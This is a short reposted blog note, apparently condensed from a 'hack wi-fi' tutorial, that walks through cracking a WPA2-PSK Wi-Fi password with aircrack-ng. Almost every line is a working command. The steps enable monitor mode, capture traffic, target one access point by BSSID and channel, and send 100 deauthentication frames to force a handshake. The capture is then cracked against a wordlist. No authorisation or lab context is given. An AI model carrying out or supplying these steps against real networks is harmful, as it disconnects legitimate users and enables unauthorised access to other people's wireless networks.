Aircrack-Ng

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/
Step0: Preparation
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to fix problem:
引用
13:45:36  Waiting for beacon frame (BSSID: 1C:FA:68:96:72:1C) on channel -1
13:45:36  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

Step1:Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng
airmon-ng start wlan0
Step 2:Capture Traffic with Airodump-Ng
airodump-ng mon0
Step 3: Focus Airodump-Ng on One AP on One Channel
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0

    08:86:30:74:22:76 is the BSSID of the AP
    -c 6 is the channel the AP is operating on
    WPAcrack is the file you want to write to
    mon0 is the monitoring wireless adapter*

Step 4: Aireplay-Ng Deauth
aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
Step 5: Capture the Handshake
Step 6: Let's Aircrack-Ng That Password!
aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

猜你喜欢

转载自j4s0nh4ck.iteye.com/blog/2170709
今日推荐